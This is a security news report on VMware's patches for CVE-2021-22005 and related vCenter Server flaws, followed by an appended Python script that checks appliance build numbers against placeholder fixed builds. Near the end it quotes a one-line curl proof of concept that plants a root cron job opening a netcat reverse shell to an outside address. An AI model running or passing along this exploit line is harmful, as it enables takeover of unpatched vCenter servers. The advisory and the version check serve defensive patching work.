VMware has fixed 19 vulnerabilities affecting VMware vCenter Server and VMware Cloud Foundation, the most critical of which is CVE-2021-22005.

“This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company noted.

“The ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available. With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.”

About VMware vCenter Server and Cloud Foundation

VMware vCenter Server is software that allows administrators to provision, monitor, orchestrate, and control their VMware vSphere deployments (virtual machines) from a centralized location. It can be installed on a Windows machine or a preconfigured Linux version (i.e., the vCenter Server Appliance).

VMware Cloud Foundation is a hybrid cloud platform that provides software-defined services for compute, storage, networking, security and cloud management to run enterprise apps in private or public environments.

The offered security updates fix 19 vulnerabilities in all, most of which have been reported by George Noseevich and Sergey Gerasimov of SolidLab LLC. The vulnerabilities affect vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x.

CVE-2021-22005 – the most critical one, with a CVSS score of 9.8 – is an arbitrary file upload vulnerability in the Analytics service, which can be used to execute commands and software on the vCenter Server Appliance. A malicious actor with network access to port 443 on vCenter Server could exploit it by uploading a specially crafted file.

“The other issues have lower CVSS scores but still may be usable to an attacker that is already inside your organization’s network,” the company explained. These can allow attackers to escalate privileges, access restricted endpoints, manipulate VM network settings, gain access to sensitive information, execute malicious scripts, delete non-critical files, and create a denial of service condition.

What to do?

As noted before, VMware urges administrators to consult the advisory, ascertain which version of the solutions they are using, and upgrade to a fixed version as soon as possible. The only workaround offered is for CVE-2021-22005; the rest of the security holes require a patch to be closed.

“At best, workarounds are temporary solutions to buy a short amount of time until patching can commence. They rely on editing files and changing vSphere in ways that are not intended and might cause serious issues if errors are made. Workarounds also tend to be more challenging for vSphere Admins who do not have deep UNIX experience. Just using UNIX text editors can be a challenge,” the company explained.

“Patching vCenter Server is much more straightforward, can be done via API or UI, does not introduce human error, does not create other operational concerns, and should already be an established process in an organization.”

Rapid7’s Glenn Thorpe also recommends that admins patch right away.

“While there are currently no reports of exploitation, we expect this to quickly change within days - just as previous critical vCenter vulnerabilities did (CVE-2021-21985, CVE-2021-21972). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet,” he added.

A very thorough Q&A document regarding these vulnerabilities and updates is available here.

“On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,” warns the US federal agency.

PT):
A working exploit for CVE-2021-22005 is now available and being used by attackers:
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv "$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" /bwjMA21ifA
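The first step under “What to do?” is to ascertain which vCenter version is deployed and whether it is at a fixed build. The script below is an added example, not code from the article, VMware or Rapid7. It assumes the appliance REST API behaves as follows: `POST /rest/com/vmware/cis/session` with HTTP Basic credentials returns `{"value": "<session id>"}`, and `GET /rest/appliance/system/version` sent with a `vmware-api-session-id` header returns `{"value": {"version": "7.0.2.00100", "build": "17958471", ...}}`. The `FIXED_BUILDS` table holds placeholders only; the real fixed build numbers for the 6.5, 6.7 and 7.0 branches must be taken from VMware's advisory before a "patched" verdict is trusted.

```python
"""Check a vCenter Server Appliance build against the fixed build for its branch.

Added example, not VMware's or Rapid7's code. Assumptions (not from the article):
  * POST /rest/com/vmware/cis/session (HTTP Basic) -> {"value": "<session id>"}
  * GET  /rest/appliance/system/version (header vmware-api-session-id)
        -> {"value": {"version": "7.0.2.00100", "build": "17958471", ...}}
  * FIXED_BUILDS contains PLACEHOLDERS; fill in the numbers from VMware's advisory.
"""
import base64
import json
import ssl
import urllib.request
from typing import Dict, NamedTuple, Optional, Tuple

# PLACEHOLDER values: replace with the fixed build per branch from VMware's advisory.
FIXED_BUILDS: Dict[str, Optional[int]] = {"6.5": None, "6.7": None, "7.0": None}


class Verdict(NamedTuple):
    branch: str                 # e.g. "7.0"
    build: int                  # build number reported by the appliance
    fixed_build: Optional[int]  # fixed build for that branch, if known
    patched: Optional[bool]     # None when no fixed build is configured for the branch


def branch_of(version: str) -> str:
    """Reduce a version string such as '7.0.2.00100' to its branch, '7.0'."""
    parts = version.strip().split(".")
    if len(parts) < 2 or not (parts[0].isdigit() and parts[1].isdigit()):
        raise ValueError(f"unrecognised vCenter version string: {version!r}")
    return f"{parts[0]}.{parts[1]}"


def assess(version: str, build: str, fixed_builds: Dict[str, Optional[int]]) -> Verdict:
    """Compare the reported build with the fixed build of the same branch.

    Build numbers increase monotonically within a branch, so a reported build
    greater than or equal to the fixed build means the fix (or a later one) is in.
    """
    branch = branch_of(version)
    if not build.isdigit():
        raise ValueError(f"build is not numeric: {build!r}")
    reported = int(build)
    fixed = fixed_builds.get(branch)
    if fixed is None:
        return Verdict(branch, reported, None, None)
    return Verdict(branch, reported, fixed, reported >= fixed)


def parse_version_response(body: str) -> Tuple[str, str]:
    """Extract (version, build) from the JSON the version endpoint is assumed to return."""
    value = json.loads(body)["value"]
    return str(value["version"]), str(value["build"])


def fetch_version(host: str, user: str, password: str, verify_tls: bool = True) -> Tuple[str, str]:
    """Log in to the appliance REST API and read its version and build (assumed endpoints)."""
    ctx = ssl.create_default_context()
    if not verify_tls:  # only for lab appliances with self-signed certificates
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    base = f"https://{host}"
    cred = base64.b64encode(f"{user}:{password}".encode()).decode()
    login = urllib.request.Request(f"{base}/rest/com/vmware/cis/session", method="POST",
                                   headers={"Authorization": f"Basic {cred}"})
    with urllib.request.urlopen(login, context=ctx) as resp:
        session_id = json.load(resp)["value"]
    query = urllib.request.Request(f"{base}/rest/appliance/system/version",
                                   headers={"vmware-api-session-id": session_id})
    with urllib.request.urlopen(query, context=ctx) as resp:
        return parse_version_response(resp.read().decode())


def describe(v: Verdict) -> str:
    """Human-readable verdict for a ticket or inventory report."""
    if v.patched is None:
        return f"branch {v.branch}, build {v.build}: no fixed build configured, cannot assess"
    state = "patched" if v.patched else "VULNERABLE: upgrade to the fixed build"
    return f"branch {v.branch}, build {v.build} vs fixed {v.fixed_build}: {state}"


if __name__ == "__main__":
    import argparse
    import getpass

    ap = argparse.ArgumentParser(description="vCenter build check for CVE-2021-22005")
    ap.add_argument("host", help="vCenter Server Appliance hostname")
    ap.add_argument("--user", required=True, help="SSO user with API access")
    ap.add_argument("--insecure", action="store_true", help="skip TLS verification (lab only)")
    args = ap.parse_args()
    version, build = fetch_version(args.host, args.user, getpass.getpass(), not args.insecure)
    print(describe(assess(version, build, FIXED_BUILDS)))
```

Run it against each appliance in the inventory rather than trusting the last change ticket: the comparison is by build number within a branch, so a 6.7 appliance is never judged against the 7.0 fixed build, and an unknown branch yields "cannot assess" instead of a false "patched".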